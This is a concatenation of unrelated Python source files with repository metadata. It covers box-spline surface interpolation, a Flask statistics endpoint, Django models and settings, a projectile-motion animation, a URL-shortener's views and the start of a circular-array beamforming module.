func_val *= (4 - 12*x[d] + 12*x[d]**2 - 3*x[d]**3)
elif (2 <= x[d] < 3):
func_val *= (-44 + 60*x[d] - 24*x[d]**2 + 3*x[d]**3)
elif (3 <= x[d] <= 4):
func_val *= (4-x[d])**3
return func_val
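# Sanity sketch (editor's addition): all three 1-D splines peak at the centre
# of the unit interval; handy reference values when debugging:
#     linear(np.array([0.5]))     # -> 1.0
#     quadratic(np.array([0.5]))  # -> 0.75
#     cubic(np.array([0.5]))      # -> 2/3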
# Pre: "x" is a 1 x N dimensional numpy array or list
# "center" is a 1 x N dimensional numpy array or list
# representing the bottom left (in cartesian coordinates) of the box
# "[.*]_width" is the set of widths of this box spline in the
# less than center and greater than center directions
# "func" is the box function to use assuming we have x scaled
# into the unit cube
# Post: The value of the selected box spline ("func") in N dimensions
# is computed for the given point.
def compute_box(x, center=None, low_width=None, upp_width=None, func=linear):
# Initialize center and width of box 3
if type(center) == type(None):
center = np.ones(x.shape)/2
if type(low_width) == type(None):
low_width = np.ones(x.shape)/2
if type(upp_width) == type(None):
upp_width = np.ones(x.shape)/2
# Make sure we don't modify the input x value when evaluating
x = x.copy()
# Scale the point to be in the space where the box is the unit cube
x -= center
x = np.where(x < 0, (1 - x / low_width)/2, (1 + x / upp_width)/2)
# If the point is outside of the box, return 0
if (min(x) <= 0) or (max(x) >= 1): return 0
# Return the final function value at that point
return func(x)
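# Quick check (editor's addition): with the default unit box the spline peaks
# at the centre and vanishes on the boundary:
#     compute_box(np.array([0.5, 0.5]), func=linear)  # -> 1.0
#     compute_box(np.array([0.0, 0.5]), func=linear)  # -> 0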
# Function for storing a center and width associated with a quadratic
# box spline as well as evaluating the box spline
class Box:
box_count = -1 # Used for generating ID numbers
# Organize the necessary values for the box
def __init__(self, center, low_width=None, upp_width=None,
func=linear, width_scalar=1.0):
# Initialize lower and upper widths if they are not given
if type(low_width) == type(None):
low_width = np.ones(center.shape) * float('inf')
if type(upp_width) == type(None):
upp_width = np.ones(center.shape) * float('inf')
# Get an id for this box
self.id = Box.box_count = Box.box_count + 1
self.box_func = func
self.width_scalar = width_scalar
self.center = center
self.low_width = low_width
self.upp_width = upp_width
# Returns true if this box contains "pt"
def contains(self, pt):
return (np.all(self.center-self.low_width < pt) and
np.all(self.center+self.upp_width > pt))
# String representation of this box
def __str__(self):
string = "ID: %s\n"%self.id
string += " center: %s\n"%self.center
string += " lower: %s\n"%(self.center - self.low_width)
string += " upper: %s\n"%(self.center + self.upp_width)
return string
# Evaluates the underlying box function for this box at a given point
def __call__(self, x):
# Return the computed quadratic box spline evaluation
return compute_box(x, self.center, self.low_width*self.width_scalar,
self.upp_width*self.width_scalar, self.box_func)
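# Illustrative use (editor's sketch): a 2-D box centred at the origin with unit
# half-widths in every direction:
#     b = Box(np.zeros(2), np.ones(2), np.ones(2), func=linear)
#     b.contains(np.array([0.2, -0.3]))   # -> True
#     b(np.array([0.0, 0.0]))             # -> 1.0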
# Function for creating a surface over a region defined by the
# axis-aligned bounding box of all data points
class BoxMesh:
def __init__(self, box_func=quadratic, width_scalar=1.0):
self.boxes = []
self.values = []
self.box_func = box_func
self.width_scalar = width_scalar
# Given a set of control points, this constructs the maximum box
# mesh, that is to say the boxes around each control point have
# the largest minimum side length possible.
# Without computing max-side-length boxes: O(n^2*log(n) * d )
# With computing max-side-length boxes: O(n^3 * d^2)
def add_points(self, control_points, max_side_length_box=False):
self.values = control_points[:,-1]
control_points = control_points[:,:-1]
# Cycle through the box centers and construct the max-boxes
        for i, (center, value) in enumerate(zip(control_points, self.values)):  # fix: values lives on self after the split above
box = Box(center, func=self.box_func, width_scalar=self.width_scalar)
# Holder for candidate boundary points for this box
candidates = list(range(len(control_points)))
candidates.pop(i)
candidates.sort(key = lambda c: np.max(abs(center - control_points[c])))
# Holder for the neighbors of this box (on its edge)
neighbors = []
# Cycle through and shrink the box, touching immediate neighbors
for c in candidates:
if not box.contains(control_points[c]): continue
other_pt = control_points[c]
# handle choosing a split dimension normally
split_dim = np.argmax(abs(center - other_pt))
# Shrink 'box' along that best dimension
width = center[split_dim] - other_pt[split_dim]
if width < 0:
box.upp_width[split_dim] = min(box.upp_width[split_dim],-width)
else:
box.low_width[split_dim] = min(box.low_width[split_dim], width)
# Update the neighbors for the new box
neighbors.append( [split_dim,c] )
# Skip the rest of the computations if we don't need max boxes
            if not max_side_length_box:  # fix: 'max_box' was an undefined name
self.boxes.append(box)
continue
# Constructing the Box with Largest Minimum Side Length
#===============================================================
print()
print()
print("========================================")
print()
print(box)
# Temporary variable names
dim = control_points.shape[1]
num_pts = control_points.shape[0]
min_bounds = np.min(control_points, axis=0)
max_bounds = np.max(control_points, axis=0)
# Try and find a larger minimum side length, once no
# improvement can be made, we must have the max-box
for _ in range(num_pts):
# Adjust the side lengths, ignoring infinities
low_width = np.where(box.low_width < float('inf'),
box.low_width, box.center - min_bounds)
upp_width = np.where(box.upp_width < float('inf'),
box.upp_width, max_bounds - box.center)
side_lengths = low_width + upp_width
# Get the smallest side and its length
min_side = np.argmin(side_lengths)
min_len = np.min(side_lengths)
# Get the current neighbors on this minimum side
to_use = [n for n in neighbors if n[0] == min_side]
print("--------------------------")
print()
print("neighbors: ",neighbors)
print("low_width: ",low_width)
print("upp_width: ",upp_width)
print("min_side: ",min_side)
print("min_len: ",min_len)
print("to_use: ",to_use)
# Cycle through all dimensions to shorten on
for d in range(dim):
# Don't try and shorten the min side
if d == min_side: continue
# Holder for knowing if we've improved the box
improved = False
# At most 2 on non-gridded data
for pt in to_use:
print()
print("Trying to use dimension %i, point %i"%(d,pt[1]))
# Get this neighboring point
neighbor_pt = control_points[pt[1]]
# Shorten the existing box on dimension d to stop at this neighbor
if neighbor_pt[d] < center[d]:
print("Shrinking the lower width along",d)
old_width = (box.low_width, box.low_width[d])
box.low_width[d] = center[d] - neighbor_pt[d]
old_neighbor = [n for n in neighbors if (
control_points[n[1],d] <= neighbor_pt[d])]
else:
print("Shrinking the upper width along",d)
old_width = (box.upp_width, box.upp_width[d])
box.upp_width[d] = neighbor_pt[d] - center[d]
old_neighbor = [n for n in neighbors if (
control_points[n[1],d] >= neighbor_pt[d])]
# Make sure that the point that is being
# reused isn't included in the neighbors to remove
if pt in old_neighbor: old_neighbor.remove(pt)
# Try and grow the box in both direction of the
# min side length (we can now squeeze through)
for growing in [box.low_width, box.upp_width]:
old_min_side = growing[min_side]
growing[min_side] = float('inf')
new_neighbor = None
# Identify the new boundary for the box
for c in candidates:
if box.contains(control_points[c]):
# If there isn't currently a new
# neighbor, or this point is
# closer than the current neighbor
if ((new_neighbor == None) or
( abs(center[min_side] - control_points[c][min_side])
<
abs(center[min_side] - control_points[new_neighbor[1]][min_side])
)):
growing[min_side] = abs(center[min_side] - control_points[c][min_side])
new_neighbor = [min_side,c]
# Adjust the side lengths, ignoring infinities
low_width = np.where(box.low_width < float('inf'),
box.low_width, box.center - min_bounds)
upp_width = np.where(box.upp_width < float('inf'),
box.upp_width, max_bounds - box.center)
side_lengths = low_width + upp_width
print("low_width: ",low_width)
print("upp_width: ",upp_width)
print("side_lengths: ",side_lengths)
print()
# Identify the new minimum dimension of the box
if np.min(side_lengths) > min_len:
print("Improved!")
print("new_neighbor: ",new_neighbor)
print(box)
# If we've increased the minimum side length
improved = True
# Formally adjust the modified neighbor boundary
pt[0] = d
# Add the new neighbor that was encountered
if new_neighbor:
print("Found new neighbor: ", new_neighbor)
neighbors.append(new_neighbor)
# Remove the now obselete neighbors on this dimension
for to_remove in old_neighbor:
print("Removing neighbor: ", to_remove)
neighbors.remove(to_remove)
old_neighbor = []
else:
print("Not improved.")
# Otherwise, revert changes
old_width[0][d] = old_width[1]
growing[min_side] = old_min_side
# Stop cycling boundary checks when successfully improved
if improved: break
print()
# Improvement found, break out of this iteration
if improved: break
else:
# If we've checked all dimensions and no
# improvement could be found, then we are done!
break
# We have now found the box with the largest minimum side length
self.boxes.append(box)
# Store the value at the center of a box (same for all boxes)
self.box_center_value = self.boxes[0](self.boxes[0].center)
# Calculate the lipschitz constant for this data
self.calculate_lipschitz()
# Stores the lipschitz constant of this data set in self.lipschitz
def calculate_lipschitz(self):
self.lipschitz = 0
# Calculate the lipschitz constant of the data
for (b,v) in zip(self.boxes,self.values):
for (other_b,other_v) in zip(self.boxes,self.values):
if (v == other_v): continue
dist = np.sqrt(np.sum((b.center - other_b.center)**2))
self.lipschitz = max(self.lipschitz, abs(v - other_v) / dist)
return self.lipschitz
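    # (Editor's note) calculate_lipschitz above is O(n^2) in the number of
    # boxes; an equivalent vectorised sketch, if SciPy were available:
    #     from scipy.spatial.distance import pdist
    #     d = pdist(centers); dv = pdist(vals[:, None], metric='cityblock')
    #     lipschitz = np.max(dv[d > 0] / d[d > 0])
    # where ``centers``/``vals`` stack the box centres and values (assumed).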
# Calculate and return the plus/minus error at a given x-value
def error(self, x):
# Get the surface value
surf_val = self(x)
# Initialize holder for plus and minus error
error = [float('inf'),float('inf')]
for (b,v) in zip(self.boxes, self.values):
dist = np.sqrt(np.sum( (b.center - x)**2 ))
error[0] = min(error[0], abs(v - dist*self.lipschitz - surf_val))
error[1] = min(error[1], abs(v + dist*self.lipschitz - surf_val))
# Remove all infinities from error
while float('inf') in error:
error[error.index(float('inf'))] = 0
# Return the plus and minus error at a given data point
return error
# Evaluate all of the box splines and return the final function
# value at the requested point.
def __call__(self, x):
# # If we're using a linear function, calculate lagrange-style interpolation value
# if (self.box_func == linear and self.width_scalar == 1.0):
# value = 0
# for (b,v) in zip(self.boxes, self.values):
# box_val = b(x)
# value += box_val * v / self.box_center_value
# return value
# Otherwise, use the NURBS approach to smoothing
numerator = denominator = 0
# Calculate the numerator and denominator
for (b,v) in zip(self.boxes, self.values):
box_val = b(x)
numerator += box_val * v
denominator += box_val
# Adjust for points outside of the region
if denominator == 0:
print("WARNING: Out of the range of all boxes.")
return None
# Return the evaluation of all box splines for this point
return numerator / denominator
# =======================
# Plotting Code
# =======================
# Produces a list of the points that define the corners of the given
# box, when the width is infinity, uses min_max
def box_corners(box, low_upp):
points = []
bits = [0] * len(box.center)
for d in range(2*len(bits)):
bit_index = d % len(bits)
bits[bit_index] = (bits[bit_index] + 1) % 2
# Scale infinite sides to be just wide of the boundary points
low_width = np.where(abs(box.low_width) != float('inf'), box.low_width, low_upp[0])
upp_width = np.where(abs(box.upp_width) != float('inf'), box.upp_width, low_upp[1])
# Add the next corner
points += [[ box.center[i] + (-low_width[i] if bits[i] else upp_width[i])
for i in range(len(bits)) ]]
return points
# Draw a box in a 2D plotly plot
def draw_2D_box(plot, box, min_max):
# Generate the absolute lower and upper plotting bounds
low_upp = [[box.center[i] - min_max[0][i],
min_max[1][i] - box.center[i]] for i in range(len(box.center))]
low_upp = np.array(low_upp).T
# Get the boundary points of the box
corners = box_corners(box, low_upp)
corners.append(corners[0])
corners = np.array(corners)
# Add the box to the plot
opacity = 0.7
plot.color_num += 1
color = plot.color(plot.color_num, alpha=opacity)
center = list(box.center)
plot.add("%s boundary"%(box.id), *list(zip(*corners)),
mode='lines', color=color, opacity=opacity)
return color
# Draw the boundary boxes for a given mesh
def draw_boxes_2D(plot, mesh):
min_max_x = (min(b.center[0] for b in mesh.boxes), max(b.center[0] for b in mesh.boxes))
min_max_y = (min(b.center[1] for b in mesh.boxes), max(b.center[1] for b in mesh.boxes))
# Add an extra buffer to the edges
extra = (0.1 * (min_max_x[1] - min_max_x[0]),
0.1 * (min_max_y[1] - min_max_y[0]))
min_max_x = (min_max_x[0] - extra[0], min_max_x[1] + extra[0])
min_max_y = (min_max_y[0] - extra[1], min_max_y[1] + extra[1])
min_max = list(zip(min_max_x, min_max_y))
colors = []
# First, draw the borders of all of the boxes
for box in mesh.boxes:
colors.append( draw_2D_box(plot, box, min_max) )
# Draw the centers second in order to make them on 'top' of the borders
for box,color in zip(mesh.boxes, colors):
plot.add("%s center"%(box.id), *[[v] for v in box.center],
show_in_legend=False, marker_size=5, symbol='square',
color=color)
# ====================================================
# Testing the code for generating box meshes
# ====================================================
if __name__ == "__main__":
use_max_box = True
random_points = True
normalize_points = False
num_points = 3
func = linear
size = 1.0
plot_range = [0.01,0.99] #[-0.2, 1.2]
plot_points = 1000
# fun = lambda x: (x[0]-num_points/3)*(x[1]-num_points/2)**2
fun = lambda x: np.cos(x[0]) * np.sin(x[1])
# Generate testing points in a grid pattern
points = np.meshgrid(range(num_points), range(num_points))
points = np.array([points[0].flatten(), points[1].flatten()]).T
if random_points:
# Generate testing points randomly spaced
points = np.random.random(size=(num_points**2,2)) * num_points
# Breaking Max-Box-Side-Length continuity
points = np.array([
[1,0],
[3,2],
[4,1],
[0,5],
[3,6],
[5,7]
])
print(points)
# Calculate the associated response values
values = np.array([[fun(pt) for pt in points]]).T
points = np.concatenate((points, values), axis=1)
    # Sort by x then y: np.lexsort keeps the secondary key order, whereas two
    # chained argsorts (the original approach) are not guaranteed stable.
    points = points[np.lexsort((points[:, 1], points[:, 0]))]
# print(points)
if normalize_points:
# Normalize the points
points[:,2] -= min(points[:,-1])
max_val = max(max(r[:-1]) for r in points)
points[:,:2] /= max_val
points[:,2] += 1.3
else:
min_val = np.min(points[:,:2])
max_val = np.max(points[:,:2])
plot_range = [ plot_range[0] * (max_val - min_val) + min_val,
(plot_range[1]-1) * (max_val - min_val) + max_val]
print("Constructing mesh...")
surf = BoxMesh(func, size)
surf.add_points(points, use_max_box)
print("Creating visualization...")
surf_p = Plot()
print(" adding control points...")
surf_p.add("Control Points", *(points.T))
print(" adding mesh surface...")
surf_p.add_func("Surface", surf, plot_range, plot_range,
use_gradient=True, plot_points=plot_points)
# surf_p.plot()
print(" creating box plot...")
boxes_p = Plot()
draw_boxes_2D(boxes_p, surf)
print(" making HTML...")
multiplot([[boxes_p,surf_p]])
# print("Constructing second mesh...")
# surf2 = BoxMesh(func, size)
# surf2.add_points(points, not use_max_box)
# print("Drawing plots...")
# boxes_p2 = Plot()
# draw_boxes_2D(boxes_p2, surf2)
# surf_p2 = Plot()
# surf_p2.add("Control Points", *(points.T))
# surf_p2.add_func("Surface", surf2, plot_range, plot_range, use_gradient=True)
# multiplot([[boxes_p,surf_p],
# [boxes_p2,surf_p2]])
| [
"[email protected]"
] | |
64f33d189625ea147141f4287452b920cda333fb | 19b2affa8ed62c2a1e6299ac6de797e602894b16 | /backend/src/server/api/stats/at_work.py | 0fe49ab0fce6071c837017169c89df887eb97621 | [] | no_license | skapin/power-elements | 8b0c24869588abe05b46d998e82090bd7e39b3a2 | 76b1547eeeea521ef655dda134a47f2469990394 | refs/heads/master | 2023-01-02T19:26:38.072353 | 2020-05-22T15:54:50 | 2020-05-22T15:54:50 | 265,940,649 | 0 | 0 | null | 2020-10-27T22:35:41 | 2020-05-21T20:03:02 | Python | UTF-8 | Python | false | false | 1,137 | py | import logging
import json
from flask import request, jsonify, abort, Blueprint
from flask_restful import Resource, reqparse
from config.settings import SETTINGS
from common.utils.security import generate_user_token, extract_payload
from db.models import Question, Account, Response
from common.db.base import Database
from flask_restful_swagger import swagger
from sqlalchemy import desc, func
LOG = logging.getLogger(__name__)
class AtWork(Resource):
@swagger.operation(
notes='Get Stats from account',
responseMessages=[
{
"code": 200,
"message": "Everything went right"
},
{
"code": 405,
"message": "file not found"
}
]
)
def get(self):
with Database(auto_commit=True) as db:
at_work_account = db.query(func.count(Account.uniqid)).filter_by(at_work=True).first()
at_home_account = db.query(func.count(Account.uniqid)).filter_by(at_work=False).first()
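            # .first() on a count() query yields a one-tuple, hence the [0]
            # indexing below; example payload (illustrative values):
            #     {"at_work_account": 12, "at_home_account": 7}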
return jsonify({'at_work_account': at_work_account[0], 'at_home_account': at_home_account[0]})
| [
"[email protected]"
] | |
49d8a0cb2a3ec05cdb81a281746a484cb2616dcb | b4c0c347cca4856bbdf82c06142ae9cd18e02746 | /api/models.py | 6ef37b3c1375701f4d646f1685e3a746a8782ab0 | [
"MIT"
] | permissive | AanandhiVB/bank-admin-backend | dfb9793eedd6a447d25ad15f3417f4933806a512 | cce02c37e06dc2cd72d160f4817ec7658714831e | refs/heads/main | 2023-05-05T15:19:35.241460 | 2021-05-23T18:49:22 | 2021-05-23T18:49:22 | 370,040,798 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 706 | py | from django.db import models
# Create your models here.
class Bank(models.Model):
name = models.CharField(max_length=100, blank=False, null=False)
class Branch(models.Model):
bank = models.ForeignKey(Bank,on_delete=models.CASCADE)
ifsc = models.CharField(max_length=100, blank=False, null=False)
branch = models.CharField(max_length=100, blank=False, null=False)
address = models.CharField(max_length=200, blank=False, null=False)
city = models.CharField(max_length=100, blank=False, null=False)
district = models.CharField(max_length=100, blank=False, null=False)
state = models.CharField(max_length=100, blank=False, null=False)
| [
"[email protected]"
] | |
241a1492ddab027c0632271bea37fbd696a507f5 | 344caf79f5640b2b6d86f5c70a92b0358e3bfc15 | /dynamics/gravity/projectile.py | 3eceac1460803d0e6318a8e339460c43d4a8b0ba | [
"BSD-3-Clause",
"LicenseRef-scancode-unknown-license-reference"
] | permissive | brettrhenderson/PySims | 8a70712864a38b3090a14ef8e45751f719d656c1 | 07fe37d1a61ef3b8f3d10ef9f393b5144acc1b96 | refs/heads/master | 2022-11-16T13:33:20.227467 | 2020-06-29T01:06:39 | 2020-06-29T01:06:39 | 275,475,316 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,203 | py | import numpy as np
import matplotlib.pyplot as plt
from matplotlib.animation import FuncAnimation
# gravitational constant 6.67408e-11 m^3 kg^-1 s^-2
G = 6.67408E-11
class Projectile:
def __init__(self, h0, v0, rg=6.731e6, g=9.8, dt=1.0, nmax=300000):
self.dt = dt
self.h0 = h0
self.g = g
self.rg = rg
self.nmax = nmax
self.xg = np.array([0, -rg])
self.x = [np.array([0, h0])]
self.v = [v0]
self.a = [self.accel_(self.x[0])]
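    # accel_ models gravity as a constant-magnitude field of strength g that
    # points from the projectile toward the planet centre xg (uniform |g|
    # rather than the 1/r^2 law -- a reasonable near-surface approximation).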
def accel_(self, r):
r_vec = self.xg - r
r_mag = np.linalg.norm(r_vec)
return self.g * r_vec / r_mag
def step_(self):
self.x.append(self.x[-1] + self.v[-1] * self.dt + 0.5 * self.a[-1] * (self.dt**2))
new_acc = self.accel_(self.x[-1])
self.v.append(self.v[-1] + 0.5 * (self.a[-1] + new_acc) * self.dt)
self.a.append(new_acc)
def compute_trajectory(self):
while (np.linalg.norm(self.x[-1] - self.xg) > self.rg) and (len(self.x) < self.nmax):
#while (self.x[-1][1] > 0) and (len(self.x) < self.nmax):
self.step_()
def animate(self, adjust_axes=False, interval=50, figsize=(10,8)):
x = np.array(self.x)
# Plot Stuff
fig = plt.figure(figsize=figsize)
ax = fig.add_subplot(111, autoscale_on=False)
path, = ax.plot([], [], 'b-', markersize=4, alpha=0.4)
proj, = ax.plot([], [], 'r-', markersize=4)
# ground = ax.hlines(0, self.x[0] - 10, self.x[-1] + 10)
ground, = ax.plot(x[:, 0], np.sqrt(self.rg**2 - x[:, 0]**2) - self.rg, 'k-')
textx = ax.text(0.8, 0.9, f'x = {self.x[0][0]:.2f}m', horizontalalignment='center',
verticalalignment='center', transform=ax.transAxes)
texty = ax.text(0.8, 0.8, f'y = {self.x[0][1]:.2f}m', horizontalalignment='center',
verticalalignment='center', transform=ax.transAxes)
textg = ax.text(0.8, 0.7, f'h = {np.linalg.norm(self.x[0] - self.xg) - self.rg:.2f}m', horizontalalignment='center',
verticalalignment='center', transform=ax.transAxes)
textv = ax.text(0.8, 0.6, f'v = {np.linalg.norm(self.v[0]):.1f}m/s', horizontalalignment='center',
verticalalignment='center', transform=ax.transAxes)
ln = [proj, path, ground, textv, textx, texty, textg]
def init_plot():
if adjust_axes:
ax.set_xlim(self.x[0][0] - 2, self.x[0][0] + 10)
ax.set_ylim(-self.h0 * 2, self.x[0][1] + 10)
else:
ax.set_xlim(self.x[0][0] - 2, self.x[-1][0] + 10)
ax.set_ylim(-self.h0 * 2, self.x[int(len(self.x)/2)][1] + 10)
plt.axis('off')
return ln
def update_plot(i):
# get current vector of jav
javv = 2.3 * (x[i] - x[i-1]) / np.linalg.norm(x[i] - x[i-1])
jav = np.array([x[i] - javv/2, x[i] + javv/2])
# proj.set_data(x[i, 0], x[i, 1])
proj.set_data(jav[:, 0], jav[:, 1])
path.set_data(x[:i+1, 0], x[:i+1, 1])
# adjust text
textx.set_text(f'x = {x[i, 0]:.2f}m')
texty.set_text(f'y = {x[i, 1]:.2f}m')
textv.set_text(f'v = {np.linalg.norm(self.v[i]):.1f}m/s')
textg.set_text(f'h = {np.linalg.norm(self.x[i] - self.xg) - self.rg:.2f}m')
if adjust_axes:
# adjust axes if needed
if self.x[i][0] > ax.get_xlim()[1] - 10:
ax.set_xlim([ax.get_xlim()[0], x[i, 0] + 10])
if self.x[i][1] > ax.get_ylim()[1] - 10:
ax.set_ylim([ax.get_ylim()[0], x[i, 1] + 10])
return ln
return FuncAnimation(fig, update_plot, init_func=init_plot, frames=len(self.x), interval=interval, blit=True, repeat=False)
if __name__ == "__main__":
h0 = 2
v0 = np.array([26, 15])
ball = Projectile(h0, v0, rg=6.731e6, g=9.8, dt=0.01, nmax=30000)
ball.compute_trajectory()
ani = ball.animate(adjust_axes=False, interval=10, figsize=(15, 6))
# ani.save('projectile.mp4', extra_args=['-vcodec', 'libx264'])
plt.show()
| [
"[email protected]"
] | |
b3f61b006eab4de683eabd97c232a3538ac61f90 | eb40d59aaceed26160aae48f6abc9dca0ab4bd1e | /project3/settings.py | 4008cf7547ce3130b5ed4f000c533160287de206 | [] | no_license | scarlos723/mail | 8936c92fe6ebb1f882334f660c88683b46a879ba | e00521240592ac13ff52dbfd6373e69011d8a36c | refs/heads/master | 2023-01-01T06:56:47.189807 | 2020-10-25T07:38:44 | 2020-10-25T07:38:44 | 305,962,361 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,253 | py | """
Django settings for project3 project.
Generated by 'django-admin startproject' using Django 3.0.2.
For more information on this file, see
https://docs.djangoproject.com/en/3.0/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/3.0/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/3.0/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = '05$4$3aew(8ywondz$g!k4m779pbvn9)euj0zp7-ae*x@4pxr+'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'mail',
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'project3.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'project3.wsgi.application'
# Database
# https://docs.djangoproject.com/en/3.0/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
AUTH_USER_MODEL = 'mail.User'
# Password validation
# https://docs.djangoproject.com/en/3.0/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/3.0/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/3.0/howto/static-files/
# PROJECT_ROOT = os.path.normpath(os.path.dirname(__file__))
# STATIC_ROOT = os.path.join(PROJECT_ROOT, 'static')
STATIC_URL = '/static/'
| [
"[email protected]"
] | |
fe6b4e9a2fa21b14b8a757cf8fcbf9e6df72eef4 | 220a1bd2b0d26475dfa357eef7f4955d13f5560f | /hwk_11_ve/bin/pip | 9a6395f55793276a645ebfa09e0e7550d776e4bf | [] | no_license | togaryo/SI507_F18_HW11_Flask | 5cefc8be0b9a1b38e5d28d446dd9d8f0ffc0fc2d | 462ffb87b440767922c71a8d805e9a97efb6f615 | refs/heads/master | 2020-04-09T05:58:24.015258 | 2018-12-03T03:28:19 | 2018-12-03T03:28:19 | 160,089,314 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 261 | #!/Users/ryo6122/Desktop/SI507/week12/hw11/hwk_11_ve/bin/python
# -*- coding: utf-8 -*-
import re
import sys
from pip._internal import main
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(main())
| [
"[email protected]"
] | ||
0dea56dcecce21edb733840c1fb5b8adbf4b9c65 | a43cb9427265e8d7f2202bf88578401beb90e47a | /url_reducer/views.py | f26495eee7e56dd543b9890abfd1cd892832fbfe | [] | no_license | danielngd/url_reduce | 7bf8896f0dcdc62acf7ec5a5df9fe68019126b3e | 8626344c19ea69b7e4b21517edb83a56ffcd90e5 | refs/heads/main | 2023-05-15T07:50:38.757052 | 2021-06-07T15:27:55 | 2021-06-07T15:27:55 | 369,886,757 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,096 | py | from django.db.models.fields import SlugField
from django.shortcuts import redirect, render
from django.http import HttpResponse
from django.db.models.functions import TruncDate
from django.db.models import Count
import string
import random
# Create your views here.
from url_reducer.models import UrlRedirect, Urllog
def home(requisicao):
return render(requisicao, 'url_reducer/index.html')
def criar_slug(N:int) -> str:
return ''.join(random.SystemRandom().choice(
string.ascii_letters + \
string.digits) for _ in range(N)
)
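# Example (editor's sketch): criar_slug(6) -> e.g. 'a3ZkQ9'. Slugs are drawn
# from 62 characters, so length-6 collisions are rare but possible; a
# production version would typically retry if the slug already exists.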
def processar(requisicao):
url = requisicao.POST.get('url')
url_redirect = UrlRedirect.objects.filter(destino=url)
if not url_redirect:
url_redirect = UrlRedirect.objects.create(
destino = url,
slug = criar_slug(6)
)
else:
url_redirect = url_redirect[0]
return redirect('/relatorios/{slug}'.format(slug=url_redirect.slug))
def relatorios(requisicao, slug):
url_redirect = UrlRedirect.objects.get(slug=slug)
url_reduzida = requisicao.build_absolute_uri(f'/{slug}')
redirecionamentos_por_data = list(
UrlRedirect.objects.filter(
slug = slug
).annotate(
data = TruncDate('logs__criado_em')
).annotate(
cliques = Count('data')
).order_by('data')
)
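    # (Editor's note) The annotate chain above appears to group this URL's
    # redirect logs by calendar day (TruncDate) and count hits per day; it
    # assumes the Urllog foreign key was declared with related_name='logs'.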
contexto = {
'reduce': url_redirect,
'url_reduzida': url_reduzida,
'redirecionamentos_por_data': redirecionamentos_por_data,
'total_cliques': sum(r.cliques for r in redirecionamentos_por_data)
}
return render(requisicao, 'url_reducer/relatorio.html', contexto)
def redirecionar(requisicao, slug):
url_redirect = UrlRedirect.objects.get(slug=slug)
Urllog.objects.create(
origem = requisicao.META.get('HTTP_REFERER'),
user_agent = requisicao.META.get('HTTP_USER_AGENT'),
host = requisicao.META.get('HTTP_HOST'),
ip = requisicao.META.get('REMOTE_ADDR'),
url_redirect = url_redirect
)
return redirect(url_redirect.destino)
| [
"[email protected]"
] | |
de83d9b23e9cd7655d6124d3683b4051a0b582ed | 2ec662ebc944b9fcc4a1b10fb61bb091b0d45c57 | /Code_Pattern/beamforming_pattern_gen_circ_array.py | 91f6fadf0dbe1f3d0e578c59edeb5daafdf4bac4 | [
"MIT"
] | permissive | tomhirsh/acoustic_beamforming | 99e98b13b6f87dede2498cb2d6c160607d307808 | f0f4222c6328566f2436313a4d430c4ad6080d59 | refs/heads/main | 2023-07-11T05:12:22.387690 | 2021-08-15T11:42:49 | 2021-08-15T11:42:49 | 395,537,242 | 0 | 0 | MIT | 2021-08-13T06:01:26 | 2021-08-13T06:01:26 | null | UTF-8 | Python | false | false | 4,912 | py | """This module plots and outputs beamforming pattern
of a circular phased array.
Author: Tom Hirshberg
"""
import numpy as np
import matplotlib.pyplot as plt
import argparse
from beamforming_pattern_gen import *
# Get amplitude law
def get_amplitude_law(N, law = 'constant', minAmp = 1):
"""Computes an amplitude law given N (number of elements),
law (type of law) and minAmp (minimum amplitude).
"""
amp_law = []
for n in range(N):
if law == 'constant':
amp_law.append(1)
elif law == 'linear':
beta = 0 if N%2!=0 else (1-minAmp)/(N-1)
amp_law.append((minAmp-1-beta) * 2/(N-1) * abs(n - (N-1) / 2) + 1 + beta)
elif law == 'log_linear':
beta = 0 if N%2!=0 else (1-lineartodB(minAmp))/(N-1)
amp_law.append(dBtoLinear((lineartodB(minAmp)-beta) * 2/(N-1) * abs(n-(N-1)/2) + beta))
elif law == 'poly2':
beta = 0 if N%2!=0 else (1-minAmp)/(N-1)
